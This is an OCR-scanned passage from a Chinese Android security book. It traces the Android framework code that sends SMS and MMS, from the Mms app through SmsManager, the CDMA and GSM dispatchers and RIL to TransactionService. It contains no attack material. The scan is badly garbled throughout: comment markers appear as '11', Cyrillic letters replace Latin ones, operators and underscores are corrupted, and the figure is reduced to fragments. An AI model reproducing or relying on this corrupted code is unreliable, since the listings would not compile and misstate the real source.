Log.e(TAG, "sendFirstQueuedMessage: failed to send message " + msgUri 
+", caught", e); 
mSending = false; 
messageF ailedToSend(msgUri, SmsManager.RESULT_ERROR_GENERIC_FAILURE); 
success = false; 
11 Sending current message fails. Try to send more pending messages 
II if there is any. 
sendBroadcast(new Intent(SmsReceiverService.ACTION_SEND_MESSAGE, 
null, 
this, 
SmsReceiver.class)); 
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} 
} 
}finally { 
c.close(); 
} 
} 
if (success) { 
11 We successfully sent all the messages in the queue. We don't need to 
ll be notified of any service changes any longer 
unRegisterForServiceStateChanges(); 
H 


) 
在 上 述 代 码 中 ， 调 用 了 文件 packages/apps/Mms/src/com/android/mms/transaction/SmsSingleRecipient- 
Senderjava 中 的 函数 sendMessage0， 功 能 是 实现 单个 联系 人 的 消息 发 送 功能 ， 有 具体 实现 代码 如 下 所 示 。 
public boolean sendMessage(long token) throws MmsException { 
if(LogTag.DEBUG SEND) ( 
Log.v(TAG, "sendMessage token: " + token); 
} 
if (mMessageText == null) { 
11 Don't try to send an empty message, and destination should be just one. 
throw new MmsException("Null message body or have multiple destinations."); 
} 
SmsManager smsManager = SmsManager.getDefault(); 
ArrayList<String> messages = null; 
if ((MmsConfig.getEmailGateway() != null) && 
(Mms.isEmailAddress(mDest) || MessageUtils.isAlias(mDest))) { 
String msgText; 
msgText = mDest + " " + mMessageText; 
mDest = MmsConfig.getEmailGateway(); 
messages = smsManager.divideMessage(msgText); // 拆 分 长 短信 , 每 条 短信 最 多 能 有 160 个 字符 
) else { 
messages = smsManager.divideMessage(mMessageText); 
// remove spaces and dashes from destination number 
II (e.g. "801 555 1212" -> "8015551212") 
1 (e.g. "+8211-123-4567" -> "+82111234567") 
mDest = Phone NumberUtils.stripSeparators(mDest); 
mDest = Conversation.verifySingleRecipient(mContext, mThreadld, mDest); 
} 


int messageCount = messages.size(); 


if (messageCount == 0){ 
11 Don't try to send an empty message. 
throw new MmsException("SmsMessageSender.sendMessage: divideMessage returned " + 
"empty messages. Original message is \"" + mMessageText + "\""); 


} 
/把 消息 移 到 Outbox 中 发 送 广播 
boolean moved = Sms.moveMessageToFolder(mContext, mUri, Sms.MESSAGE TYPE OUTBOX, 0); 
if (Imoved) { 
throw new MmsException("SmsMessageSender.sendMessage: couldn't move message " + 
"to outbox: " * mUri); 
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} 
if (LogTag.DEBUG_SEND) { 
Log.v(TAG, "sendMessage mDest: " + mDest + " mRequestDeliveryReport: " + 
mRequestDeliveryReport); 
} 


ArrayList<Pendinglntent> deliveryIntents = пем ArrayList<Pendinglntent>(messageCount); 
ArrayList<Pendinglntent> sentintents = new ArrayList<Pendinglntent>(messageCount); 
for (int i = 0; i < messageCount; i++) { 
if (mRequestDeliveryReport && (i == (messageCount - 1))) ( 
// TODO: Fix: It should not be necessary to 
11 specify the class in this intent. Doing that 
// unnecessarily limits customizability 
deliveryIntents.add(Pendinglntent.getBroadcast( 
mContext, 0, 
new Intent( 
/标识 短信 已 发 送 ， 发 送 广播 
MessageStatusReceiver.MESSAGE STATUS RECEIVED ACTION, 
mUri, 
mContext, 
MessageStatusReceiver.class), 
0)); 


}else{ 
deliveryIntents.add(null); 
} 
Intent intent = new Intent(SmsReceiverService.MESSAGE_SENT_ACTION， 
mUri, 
mContext, 
SmsReceiver.class); 


int requestCode = 0; 
if (i == messageCount -1) ( 
// 如 果 是 长 短信 的 最 后 一 部 分 ， 则 执行 发 送 下 一 条 短信 的 操作 
requestCode = 1; 
intent.putExtra(SmsReceiverService.EXTRA MESSAGE SENT SEND NEXT, true); 
) 
if (LogTag.DEBUG SEND) { 
Log.v(TAG, "sendMessage sendintent: " + intent); 
) 
sentintents.add(PendingIntent.getBroadcast(mContext, requestCode, intent, 0)); 
} 
try { 
// 短 信和 处 理 完 后 ， 交 由 底层 来 发 送 消息 
smsManager.sendMultipartTextMessage(mDest, mServiceCenter, messages,  sentlntents, 
deliveryIntents); 
) catch (Exception ex) ( 
Log.e(TAG, "SmsMessageSender.sendMessage: caught", ex); 
throw new MmsException("SmsMessageSender.sendMessage: caught " + ex + 
" from SmsManager.sendTextMessage()"); 
} 
if (Log.isLoggable(LogTag. TRANSACTION, Log. VERBOSE) || LogTag.DEBUG_SEND) { 
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log("sendMessage: address=" + mDest + ", threadld=" + mThreadld + 
", uri=" + mUri + ", msgs.count=" + messageCount); 
} 
return false; 


} 


private void log(String msg) { 
Log.d(LogTag.TAG, "[SmsSingleRecipientSender] " + msg); 
} 


} 

在 上 述 代 码 中 ， 调 用 底层 函数 sendMultipartTextMessage() 来 发 送 短信 ， 此 函数 在 文件 frameworks/opt/ 
telephony/src/java/android/telephony/gsm/SmsManager.java 中 实现 ， 有 具体 实现 代码 如 下 所 示 。 

public final void sendMultipartTextMessage( 

String destinationAddress, String scAddress, ArrayList<String> parts, 
ArrayList<Pendinglntent> sentlntents, ArrayList<Pendinglntent> deliverylntents) ( 
mSmsMgrProxy.sendMultipartTextMessage(destinationAddress, scAddress, parts, 
sentintents, deliverylntents); 

) 

当 sendMultipartTextMessage() 调 用 函数 sendMultipartText() 时 表示 发 送 多 文本 短信 信息 ， 当 sendMultipart- 
TextMessage() 调 用 函数 sendText 时 表示 发 送 短 的 文本 信息 。 这 两 个 函数 在 文件 frameworks/opt/telephony/ 
src/java/com/android/internal/telephony/IccSmsInterface Manager.java 中 定义 ， 具 体 实现 代码 如 下 所 示 。 

public void sendMultipartText(String callingPackage, String destAddr, String scAddr, 

List<String> parts, List<Pendinglntent> sentlntents, 
List<Pendinglntent> deliveryIntents) ( 
mPhone.getContext().enforceCallingPermission( 
Manifest.permission.SEND SMS, 
"Sending SMS message"); 
if (Rlog.isLoggable("SMS", Log. VERBOSE)) { 
int i= 0; 
for (String part : parts) ( 
log("sendMultipartText: destAddr=" + destAddr + ", srAddr=" + scAddr + 
", part[" + (i++) + "]=" + part); 
$ 
} 
if (mAppOps.noteOp(AppOpsManager.OP_SEND_SMS, Binder.getCallingUid(), 
callingPackage) != AppOpsManager.MODE ALLOWED) { 
return; 
} 
mDispatcher.sendMultipartText(destAddr, scAddr, (ArrayList<String>) parts, 
(ArrayList<Pendinglntent>) sentintents, (ArrayList<Pendinglntent>) deliveryIntents); 
} 
public void sendText(String callingPackage, String destAddr, String scAddr, 
String text, PendingIntent sentIntent, PendingIntent deliveryIntent) í 
mPhone.getContext().enforceCallingPermission( 
Manifest.permission.SEND SMS, 
"Sending SMS message"); 
if (Rlog.isLoggable("SMS", Log. VERBOSE)) ( 
log("sendText: destAddr=" + destAddr + " scAddr-" + scAddr + 
"text="+ text +" sentlntent=" + 
sentintent + " deliveryIntent-" + deliveryIntent); 
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} 
if (mAppOps.noteOp(AppOpsManager.OP_SEND_SMS, Binder.getCallingUid(), 
callingPackage) != AppOpsManager. MODE ALLOWED) { 
return; 
Y. 
mDispatcher.sendText(destAddr, scAddr, text, sentlntent, deliveryIntent); 


) 
到 此 为 止 ， 整 个 短信 的 基本 发 送 流程 介绍 完毕 。 在 接 下 来 的 内 容 中 ， 将 根据 网 络 模式 进行 短信 发 送 处 
Jil, fE Android 系统 中 ， 内 置 了 СОМА 和 GSM 两 种 模式 ， 具 体 过 程 如 图 8-2 所 示 。 


天 断 当前 phone 类 型 


GSM CDMA 
* + 
GsmSMSDispatcher CDMADispatcher 
handleStatusReport() dispatchMessage ( ) 
获取 SmsMessage 对 象 获取 teleSemice 值 
T 
handleCdmaStatusReport ( ) 
FieliveryPendingList FR ЖЕЎ] e Pend quam GER] 
eliveryPendingList 中 获取 | 
SmsTracker 对 象 SmsTracker 对 象 
* 
发 送 成 功 的 确认 消息 


( GameOver ) 
w— 


图 8-2 СОМА 模式 和 GSM 模式 


СОМА 模式 在 文件 frameworks/opt/telephony/src/java/com/android/internal/telephony/cdma/CdmaSMS- 
Dispatcher.java 中 实现 , 发 送 过 程 是 通过 依次 调用 函数 sendText()-> sendSubmitPdu()-> sendRawPdu() 实 现 的 ， 
具体 实现 代码 如 下 所 示 。 

protected void sendText(String destAddr, String scAddr, String text, 

PendinglIntent sentintent, PendingIntent deliveryIntent) { 
SmsMessage.SubmitPdu pdu = SmsMessage.getSubmitPdu( 
scAddr, destAddr, text, (deliveryIntent != null), null); 
sendSubmitPdu(pdu, sentintent, deliveryIntent, destAddr); 
} 
protected void sendSubmitPdu(SmsMessage.SubmitPdu pdu, 
Pendinglntent sentlntent, Pendinglntent deliveryIntent, String destAddr) { 
if (SystemProperties.getBoolean(TelephonyProperties. PROPERTY INECM MODE, false)) ( 
if (sentIntent != null) { 
try{ 
sentintent.send(SmsManager.RESULT ERROR NO SERVICE); 
) catch (CanceledException ex) { ) 


e 
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} 
if (VDBG) { 
Rlog.d(TAG, "Block SMS in Emergency Callback mode"); 
} 
return; 


} 
sendRawPdu(pdu.encodedScAddress, pdu.encodedMessage, sentintent, deliveryIntent, destAddr); 


} 

接 下 来 将 根据 sendSms 和 sendMessage 选项 进行 处 理 ,在 sendSms 线路 下 ,将 调用 文件 frameworks/opt/ 
telephony/src/java/com/android/internal/telephony/RIL.java 的 函数 sendCdmaSms 来 发 送 数据 信息 ， 具 体 实 现代 
码 如 下 所 示 。 

public void 

sendCdmaSms(byte[ ] pdu, Message result) ( 

int address nbr of digits; 

int subaddr nbr of digits; 

int bearerDataLength; 

ByteArrayInputStream bais = new ByteArrayInputStream(pdu); 
DatalnputStream dis = new DatalnputStream(bais); 


RiLRequest rr 
= RiLRequest.obtain(RIL REQUEST CDMA SEND SMS, result); 


try { 
rr.mParcel.writeInt(dis.readlnt()); //teleServiceld 
rr.mParcel.writeByte((byte) dis.readint()); //servicePresent 
rr.mParcel.writelnt(dis.readlnt()); //serviceCategory 
rr.mParcel.writelnt(dis.read()); //address digit mode 
rr.mParcel.writelnt(dis.read()); //address nbr mode 
rr.mParcel.writeInt(dis.read()); //address ton 
rr.mParcel.writelnt(dis.read()); //address nbr plan 
address nbr of digits 7 (byte) dis.read(); 
rr.mParcel.writeByte((byte) address nbr of digits); 
for(int i=0; i < address nbr of digits; i++){ 
rr.mParcel.writeByte(dis.readByte()); // address orig bytes[i] 
) 
rr.mParcel.writelnt(dis.read()); //subaddressType 
rr.mParcel.writeByte((byte) dis.read()); //subaddr odd 
subaddr nbr of digits = (byte) dis.read(); 
rr.mParcel.writeByte((byte) subaddr nbr of digits); 
for(int i=0; i < subaddr nbr of digits; i++)( 
rr.mParcel.writeByte(dis.readByte()); //subaddr orig bytes[i] 
} 


bearerDataLength = dis.read(); 
rr.mParcel.writelnt(bearerDataLength); 
for(int і=0; i < bearerDataLength; i++){ 
tr.mParcel.writeB yte(dis.readByte()); //bearerData[i] 
} 
Jcatch (IOException ex 
if (RILJ LOGD) riljLog("sendSmsCdma: conversion from input stream to object failed: " 


ОООО Android 系统 安全 和 反 编 译 实战 


+ ex); 


} 
if (RILJ LOGD) riljLog(rr.serialString() + "> " + requestToString(rr.mRequest)); 


send(rr); 
} 
在 上 述 代码 中 ， 通 过 调用 文件 hardware/ril/reference-ril/reference-ril.c 中 的 如 下 case 语句 实现 处 理 。 
case RIL REQUEST CDMA SEND SMS: 

requestCdmaSendSMS (data, datalen, t); 

break; 
在 上 述 代码 中 ， 通 过 调用 函数 requestCdmaSendSMSO 实 现 了 数据 处 理 功能 ， 有 具体 实现 代码 如 下 所 示 。 
static void requestCdmaSendSMS(void *data, size t datalen, RIL Token t) 
{ 


int err = 1; // Set to go to error: 
RIL_SMS_Response response; 
RIL_CDMA_SMS_Message* rcsm; 


RLOGD("requestCdmaSendSMS datalen=%d, sizeof(RIL СОМА SMS Меѕѕаде)=%а", 
datalen, sizeof(RIL СОМА SMS Message)); 


11 verify data content to test marshalling/unmarshalling: 

resm = (RIL СОМА SMS Message" )data; 

RLOGDY('TeleservicelD-?6d, blsServicePresent=%d, V 
uServicecategory=%d, sAddress.digit_mode=%d, \ 
sAddress.Number_mode=%d, sAddress.number_type=%d, ", 
rcsm-»uTeleservicelD, rcsm-»blsServicePresent, 
rcsm-»uServicecategory,rcsm-»sAddress.digit mode, 
rcsm-»sAddress.number mode,rcsm-»sAddress.number type); 


if (err != 0) goto error; 


11 Сата Send SMS implementation will go here: 
// But it is not implemented yet 


memset(&response, 0, sizeof(response)); 
RIL_onRequestComplete(t, RIL E SUCCESS, &response, sizeof(response)); 
return; 


error: 
11 Сата Send SMS will always cause send retry error 
RIL onRequestComplete(t, RILE SMS SEND FAIL RETRY, NULL, 0); 
} 
而 在 sendMessage 线路 下 ， 会 直接 跳 转 到 文件 hardware/ril/reference-ril/reference-ril.c 的 如 下 case 语句 实 
现 处 理 。 
case RIL REQUEST CDMA SEND SMS: 
requestCdmaSendSMS (data, datalen, t); 
break; 


后 面 的 过 程 就 和 sendSms 线路 完全 一 致 了 。 


ё 
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GSM 0750 frameworks/opt/telephony/src/java/com/android/internal/telephony/gsm/GsmSMSDispatcher.java 
中 实现 , 接 下 来 将 根据 sendSms 和 sendMessage 选项 进行 处 理 , 在 sendSms 线路 下 , 首先 执行 函数 sendText(), 
有 具体 实现 代码 如 下 所 示 。 
protected void sendText(String destAddr, String scAddr String text, 
Pendinglntent sentintent, Pendinglntent deliveryIntent) ( 
SmsMessage.SubmitPdu pdu = SmsMessage.getSubmitPdu( 
scAddr, destAddr, text, (deliveryIntent != null)); 
if (pdu != null) ( 
sendRawPdu(pdu.encodedScAddress, pdu.encodedMessage, sentintent, deliveryIntent, 
destAddr); 
) else ( 
Rlog.e(TAG, "GsmSMSDispatcher.sendText(): getSubmitPdu() returned null"); 
} 
} 
然后 跳 转 到 文件 hardware/ril/reference-ril/reference-ril.c 的 如 下 case 语句 实现 处 理 。 
case RIL_REQUEST_SEND_SMS: 
requestSendSMS(data, datalen, t); 
break; 
而 在 sendMessage 线路 下 ， 会 直接 跳 转 到 文件 hardware/ril/reference-ril/reference-ril.c 的 如 下 case 语句 实 
现 处 理 。 
case RIL_REQUEST_SEND_SMS: 
requestSendSMS(data, datalen, t); 
break; 


8.1.3 发送 彩 信 的 过 程 


在 Android 系统 中 ， 如 果 发 送 的 是 彩信 ， 首 先 在 文件 packages/apps/Mms/src/com/android/mms/data/ 
WorkingMessagejava 中 ,通过 函数 sendSmsWorker() 创 建 一 个 SmsMessageSender， 将 消息 存 入 发 送 队 列 中 并 通 
ЖП SmsReceiver 发 送 。 具 体 实现 代码 如 下 所 示 。 

private void sendSmsWorker(String msgText, String semiSepRecipients, long threadld) ( 

String[ ] dests = TextUtils.split(semiSepRecipients, ";"); 
if (LogTag. VERBOSE || Log.isLoggable(LogTag. TRANSACTION, Log.VERBOSE)) ( 
Log.d(LogTag. TRANSACTION, "sendSmsWorker sending message: recipients" + 
semiSepRecipients + ", threadld=" + threadld); 


) 
MessageSender sender = new SmsMessageSender(mActivity, dests, msgText, threadld); 
try{ 

sender.sendMessage(threadld); 


/Make sure this thread isn't over the limits in message count 
Recycler.getSmsRecycler().deleteOldMessagesByThreadId(mActivity, threadld); 
) catch (Exception e) ( 
Log.e(TAG, "Failed to send SMS message, threadld-" + threadld, e); 
5 


mStatusListener.onMessageSent(); 
MmsWidgetProvider.notify DatasetChanged(mActivity); 
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private void sendMmsWorker(Conversation conv, Uri mmsUri, PduPersister persister, 

SlideshowModel slideshow, SendReq sendReq, boolean textOnly) { 

long threadld = 0; 

Cursor cursor - null; 

boolean newMessage - false; 

try { 
// Put a placeholder message in the database first 
DraftCache.getInstance().setSavingDraft(true); 
mStatusListener.onPreMessageSent(); 


11 Make sure we are still using the correct thread ID for our 
// recipient set 
threadld = conv.ensureThreadld(); 


if (Log.isLoggable(LogTag.APP, Log. VERBOSE)) { 
LogTag.debug("sendMmsWorker: update draft MMS message " + mmsUri + 
" threadld: " + threadid); 
} 


// One last check to verify the address of the recipient 
String[ ] dests = conv.getRecipients().getNumbers(true /* scrub for MMS address */); 
if (dests.length == 1) ( 
11 verify the single address matches what's in the database. If we get a different 
/ll address back, jam the new value back into the SendReq 
String newAddress = 
Conversation.verifySingleRecipient(mActivity, conv.getThreadld(), dests[0]); 


if (Log.isLoggable(LogTag.APP, Log. VERBOSE)) { 
LogTag.debug("sendMmsWorker: newAddress " + newAddress + 
" dests[0]: " * dests[0]); 
) 


if (InewAddress.equals(dests[0])) ( 
dests[0] = newAddress; 
EncodedStringValue[ ] encodedNumbers = EncodedStringValue.encodeStrings(dests); 
if (encodedNumbers != null) { 
if (Log.isLoggable(LogTag.APP, Log. VERBOSE)) { 
LogTag.debug("sendMmsWorker: REPLACING number!!!"); 


} 
sendReq.setTo(encodedNumbers); 
} 
} 
} 
newMessage = mmsUri == null; 
if (newMessage) { 


1 Write something in the database so the new message will appear as sending 
ContentValues values = new ContentValues(); 

values.put(Mms.MESSAGE_BOX, Mms.MESSAGE_BOX_OUTBOX); 
values.put(Mms.THREAD_ID, threadld); 

values.put(Mms.MESSAGE TYPE, PduHeaders.MESSAGE TYPE SEND REQ); 


ass ”短信 系统 的 安全 人 和 


if (textOnly) ( 
values.put(Mms.TEXT ONLY, 1); 
} 
mmsUri = SqliteWrapper.insert(mActivity, mContentResolver, Mms.Outbox. CONTENT URI, 
values); 
} 
mStatusListener.onMessageSent(); 


И If user tries to send the message, it's a signal the inputted text is 
11 what they wanted. 
UserHappinessSignals.userAcceptedImeText(mActivity); 


11 First make sure we don't have too many outstanding unsent message 
cursor = SqliteWrapper.query(mActivity, mContentResolver, 
Mms.Outbox.CONTENT URI, MMS OUTBOX PROJECTION, null, null, null); 
if (cursor != null) ( 
long maxMessageSize = MmsConfig.getMaxSizeScaleForPendingMmsAllowed() * 
MmsConfig.getMaxMessageSize(); 
long totalPendingSize = 0; 
while (cursor.moveToNext()) { 
totalPendingSize += cursor.getLtong(:MMS MESSAGE SIZE INDEX); 
} 
if (totalPendingSize >= maxMessageSize) ( 
unDiscard(); /it wasn't successfully sent. Allow it to be saved as a draft. 
mStatusListener.onMaxPendingMessagesReached(); 
markMmsMessageWithError(mmsUni); 


return; 
} 
} 
} finally { 
if (cursor != null) { 
cursor.close(); 
} 
} 
try { 
if (newMessage) { 
11 Create anew MMS message if one hasn't been made yet 
mmsUri = createDraftMmsMessage(persister, sendReq, slideshow, mmsUri, 
maActivity, null); 
}else { 
11 Otherwise, sync the MMS message in progress to disk 
updateDraftMmsMessage(mmsuUri, persister, slideshow, sendReq, null); 
} 


II Be paranoid and clean any draft SMS up 
deleteDraftSmsMessage(threadld); 
} finally { 
DraftCache.getinstance().setSavingDraft(false); 
} 
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11 Resize all the resizeable attachments (e.g. pictures) to fit 
// in the remaining space in the slideshow 
int error = 0; 
try{ 
Slideshow.finalResize(mmsUri); 
) catch (ExceedMessageSizeException e1) ( 
error = MESSAGE SIZE EXCEEDED; 
} catch (MmsException e1) { 
error = UNKNOWN ERROR; 


} 

if (error != 0) { 
markMmsMessageWithError(mmsuUri); 
mStatusListener.onAttachmentError(error); 
return; 

) 


MessageSender sender = new MmsMessageSender(mActivity, mmsUri, 
slideshow.getCurrentMessageSize()); 


try( 
if (Isender.sendMessage(threadld)) ( 
1 The message was sent through SMS protocol, we should 
I| delete the copy which was previously saved in MMS drafts 
SqliteWrapper.delete(mActivity, mContentResolver, mmsUri, null, null); 
} 


// Make sure this thread isn't over the limits in message count 
Recycler.getMmsRecycler().deleteOldMessagesByThreadid(mActivity, threadld); 
} catch (Exception e) { 
Log.e(TAG, "Failed to send message: " + mmsUri + ", threadid=" + threadld, e); 
} 
MmsWidgetProvider.notify DatasetChanged(mActivity); 
} 
在 上 述 代 码 中 ， 调 用 函数 createDraftMmsMessage() 把 slideshow 对 象 中 约 灯 片 信息 转化 成 PduPart 的 字 
节 数 组 ， 也 就 是 把 彩信 里 的 媒体 文件 〈 图 片 、 音 频 、 视 频 和 其 他 类 型 的 文件 ) 编码 。 函 数 createDraftMms- 
Message0 的 具体 实现 代码 如 下 所 示 。 
private static Uri createDraftMmsMessage(PduPersister persister, SendReq sendReq, 
SlideshowModel slideshow, Uri preUri, Context context, 
HashMap<Uri, InputStream» preOpenedFiles) ( 
if (slideshow == null) ( 
return null; 
) 
try { 

PduBody pb = slideshow.toPduBody(); 

sendReq.setBody(pb); 

Uri res = persister.persist(sendReq, preUri == null ? Mms.Draft. CONTENT URI : preUri, 
true, MessagingPreferenceActivity.getlsGroupMmsEnabled(context), 
preOpenedFiles); 

slideshow.sync(pb); 

return res; 

} catch (MmsException e) { 


return null; 
e. 
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} 


} 
将 彩信 里 的 媒体 文件 (图 片 、 音 频 、 视 频 和 其 他 类 型 的 文件 ) 进行 编码 的 过 程 是 通过 文件 раскавеѕ/аррѕ/ 
Mms/src/com/android/mms/model/SlideshowModel.java 实现 的 ， 具 体 代码 如 下 所 示 。 
private PduBody makePduBody(SMILDocument document) { 
PduBody pb = new PduBody(); 


boolean hasForwardLock = false; 
for(SlideModel slide : mSlides){ 
for (MediaModel media : slide) ( 
PduPart part = new PduPart(); 


if (media.isText()) ( 
TextModel text = (TextModel) media; 
11 Don't create empty text part 
if (TextUtils.isEmpty(text.getText())) { 

continue; 

} 
11 Set Charset if it's a text media. 
part.setCharset(text.getCharset()); 

} 


11 Set Content-Type 
part.setContentType(media.getContentType().getBytes()); 


String src = media.getSrc(); 
String location; 
boolean startWithContentld = src.startsWith("cid:"); 
if (startWithContentld) ( 
location = src.substring("cid:".length()); 
) else ( 
location = src; 


) 


11 Set Content-Location 
part.setContentLocation(location.getBytes()); 


11 Set Content-Id 

if (startWithContentld) ( 
//Keep the original Content-Id 
part.setContentld(location.getBytes()); 


} 
else ( 
int index = location.lastIndexOf("."); 
String contentld = (index == -1) ? location 
:location.substring(0, index); 
part.setContentld(contentld.getBytes()); 
b 


if (media.isText()) ( 
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part.setData(((TextModel) media).getText().getBytes()); 

} else if (media.islImage() || media.isVideo() || media.isAudio()) { 
part.setDataUri(media.getUri()); 

)else ( 
Log.w(TAG, "Unsupport media: " + media); 

} 


pb.addPart(part); 
H 


11 Create and insert SMIL part(as the first part) into the PduBody 
ByteArrayOutputStream out = new ByteArrayOutputStream(); 
SmilXmlSerializer.serialize(document, out); 

PduPart smilPart = new PduPart(); 
smilPart.setContentld("smil".getBytes()); 
smilPart.setContentLocation("smil.xml".getBytes()); 
smilPart.setContentType(ContentType.APP SMIL.getBytes()); 
smilPart.setData(out.toByteArray()); 

pb.addPart(0, smilPart); 


return pb; 


} 
接 下 来 会 调用 文件 Android 4.3/packages/apps/Mms/src/com/android/mms/transaction/MmsMessageSender.java 
中 的 函数 进行 发 送 处 理 ， 具 体 实现 代码 如 下 所 示 。 
public boolean sendMessage(long token) throws MmsException { 
11 Load the MMS from the message uri 
if (Log.isLoggable(LogTag.APP, Log. VERBOSE)) ( 
LogTag.debug("sendMessage uri: " + mMessageUri); 
) 
PduPersister p = PduPersister.getPduPersister(mContext); 
GenericPdu pdu = p.load(mMessageUri); 


if (pdu.getMessageType() != PduHeaders.MESSAGE TYPE SEND REQ)( 
throw new MmsException("Invalid message: " + pdu.getMessageType()); 

} 

SendReq sendReq = (SendReq) pdu; 


11 Update headers 
updatePreferencesHeaders(sendReq); 


I| MessageClass 
sendReq.setMessageClass(DEFAULT MESSAGE CLASS.getBytes()); 


11 Update the 'date' field of the message before sending it 
sendReq.setDate(System.currentTimeMillis() / 1000L); 


sendReq.setMessageSize(mMessageSize); 
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p.updateHeaders(mMessageUri, sendReq); 
long messageld = ContentUris.parseld(mMessageUni); 


11 Move the message into MMS Outbox 
if (ImMessageUri.toString().startsWith(Mms.Draft.CONTENT URI.toString())) ( 
11 If the message is already in the outbox (most likely because we created a "primed" 
1 message in the outbox when the user hit send), then we have to manually put an 
11 entry іп the pending msgs table which is where TransacationService looks for 
1 messages to send. Normally, the entry in pending msgs is created by the trigger: 
ll insert mms pending on update, when a message is moved from drafts to the outbox 
ContentValues values = new ContentValues(7); 


values.put(PendingMessages.PROTO TYPE, MmsSms.MMS PROTO); 
values.put(PendingMessages.MSG ID, messageld); 
values.put(PendingMessages.MSG TYPE, pdu.getMessageType()); 
values.put(PendingMessages.ERROR TYPE, 0); 
values.put(PendingMessages.ERROR CODE, 0); 
values.put(PendingMessages.RETRY INDEX, 0); 
values.put(PendingMessages.DUE TIME, 0); 


SqliteWrapper.insert(mContext, mContext.getContentResolver(), 
PendingMessages.CONTENT URI, values); 
) else { 
p.move(mMessageUri, Mms.Outbox. CONTENT URI); 
) 


11 Start MMS transaction service 
SendingProgressTokenManager.put(messageld, token); 
mContext.startService(new Intent(mContext, TransactionService.class)); 


return true; 

} 

接 下 来 进入 核心 文件 packages/apps/Mms/sre/com/android/mms/transaction/TransactionService.java, 在 此 文 
件 中 涉及 了 许多 判断 功能 ， 主 要 有 网 络 状态 判断 、 开 启 彩 信 网 络 应 用 判断 、 关 闭 彩 信 网 络 应 用 判断 、 发 送 
彩信 和 接收 彩信 等 ， 并 将 判断 结果 转 给 对 应 的 文件 sendTransactionjava. NotificationTransaction.java 和 
RetriveTransaction.java 进行 下 一 步 处 理 。 其 中 函数 beginMmsConnectivity0 用 于 开启 彩信 功能 ， 有 具体 实现 代 
码 如 下 所 示 。 

protected int beginMmsConnectivity() throws IOException { 

11 Take a wake lock so we don't fall asleep before the message is downloaded 
createWakeLock(); 


int result = mConnMgr.startUsingNetworkFeature( 
ConnectivityManager.TYPE MOBILE, Phone.FEATURE ENABLE MMS); 


if (Log.isLoggable(LogTag. TRANSACTION, Log.VERBOSE)) { 
Log.v(TAG, "beginMmsConnectivity: result-" + result); 
1 


switch (result) ( 
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case PhoneConstants.APN ALREADY ACTIVE: 
case PhoneConstants.APN REQUEST STARTED: 
acquireWakeLock(); 
return result; 


) 


throw new IOException("Cannot establish MMS connectivity"); 
} 
函数 endMmsConnectivity() 用 于 关闭 彩信 功能 ， 具 体 实 现代 码 如 下 所 示 。 
protected void endMmsConnectivity() ( 
try { 
if (Log.isLoggable(LogTag. TRANSACTION, Log. VERBOSE)) { 
Log.v(TAG, "endMmsConnectivity"); 
} 


II cancel timer for renewal of lease 
mServiceHandler.removeMessages(EVENT_CONTINUE_MMS_CONNECTIVITY); 
if (mConnMgr != null) ( 
mConnMgr.stopUsingNetworkFeature( 
ConnectivityManager.TYPE MOBILE, 
Phone.FEATURE ENABLE MMS); 
} 
) finally ( 
releaseWakeLock(); 
) 
) 
函数 onNetworkUnavailable0 用 于 监听 当前 的 网 络 是 否 可 用 ， 具 体 实现 代码 如 下 所 示 。 
private void onNetworkUnavailable(int serviceld, int transactionType){ 
if (Log.isLoggable(LogTag. TRANSACTION, Log.VERBOSE)){ 
Log.v(TAG, "onNetworkUnavailable: sid=" + serviceld + ", type=" + transactionType); 


} 


int toastType = TOAST NONE; 
if (transactionType == Transaction.RETRIEVE TRANSACTION) ( 
toastType = TOAST DOWNLOAD LATER; 
} else if (transactionType == Transaction.SSEND TRANSACTION) ( 
toastType - TOAST MSG QUEUED; 
} 
if (toastType != TOAST NONE) ( 
mToastHandler.sendEmptyMessage(toastT ype); 
} 
stopSelf(serviceld); 
} 
接 下 来 进入 文件 packages/apps/Mms/sre/com/android/mms/transaction/SendTransaction java, 实现 线程 发 送 
处 理 ,在 此 文件 中 实现 Runnable 接口 后 , 在 函数 mun0) 中 实现 真正 的 发 送 处 理 功能 。 具 体 实现 代码 如 下 所 示 。 
public void process(){ 
mThread = new Thread(this, "SendTransaction"); 
mThread.start(); 
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public void run() { 
try{ 
RateController rateCtlr = RateController.getlnstance(); 
if (rateCtlr.isLimitSurpassed() && !rateCtlr.isAllowedByUser()) { 
Log.e(TAG, "Sending rate limit surpassed."); 
retum; 


} 


11 Load M-Send.req from outbox 
PduPersister persister = PduPersister.getPduPersister(mContext); 
SendReq sendReq = (SendReq) persister.load(mSendReqURI); 


11 Update the 'date' field of the PDU right before sending it 
long date = System.currentTimeMillis() / 1000L; 
sendReq.setDate(date); 


// Persist the new date value into database 

ContentValues values = new ContentValues(1); 

values.put(Mms.DATE, date); 

SqliteWrapper.update(mContext, mContext.getContentResolver(), 
mSendReqURI, values, null, null); 


// fix bug 2100169: insert the 'from' address per spec 
String lineNumber = MessageUtils.getLocalNumber(); 
if (ITextUtils.isEmpty(lineNumber)) ( 
sendReq.setFrom(new EncodedStringValue(lineNumber)); 
} 


// Pack M-Send.req, send it, retrieve confirmation data, and parse it 

long tokenKey = ContentUris.parseld(mSendReqURI); 

byte[ ] response = sendPdu(SendingProgressTokenManager.get(tokenKey), 
new PduComposer(mContext, sendReq).make()); 

SendingProgressTokenManager.remove(tokenKey); 


if (Log.isLoggable(LogTag. TRANSACTION, Log. VERBOSE)) ( 

String respStr = new String(response); 

Log.d(TAG, "[SendTransaction] run: send mms msg (" + mld + "), respz" + respStr); 
} 


SendConf conf = (SendConf) new PduParser(response).parse(); 
if (conf == null) { 

Log.e(TAG, "No M-Send.conf received."); 
} 


11 Check whether the responding Transaction-ID is consistent 
JI with the sent one 
byte[ ] regld = sendReq.getTransactionld(); 
byte[ ] confld = conf.getTransactionld(); 
if (!Arrays.equals(reqid, сопћа)) ( 
Log.e(TAG, "Inconsistent Transaction-ID: req=" 
+ new String(regld) + ", conf=" + new String(confld)); 
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return; 


} 


11 From now on, we won't save the whole M-Send.conf into 
// our database. Instead, we just save some interesting fields 
ll into the related M-Send.req 

values = new ContentValues(2); 

int respStatus = conf.getResponseStatus(); 
values.put(Mms.RESPONSE STATUS, respStatus); 


if (respStatus != PduHeaders.RESPONSE STATUS ОК) { 
SqliteWrapper.update(mContext, mContext.getContentResolver(), 
mSendReqURI, values, null, null); 
Log.e(TAG, "Server returned an error code: " * respStatus); 
retum; 


) 


String messageld = PduPersister.tolsoString(conf.getMessageld()); 

values.put(Mms.MESSAGE ID, messageld); 

SqliteWrapper.update(mContext, mContext.getContentResolver(), 
mSendReqURI, values, null, null); 


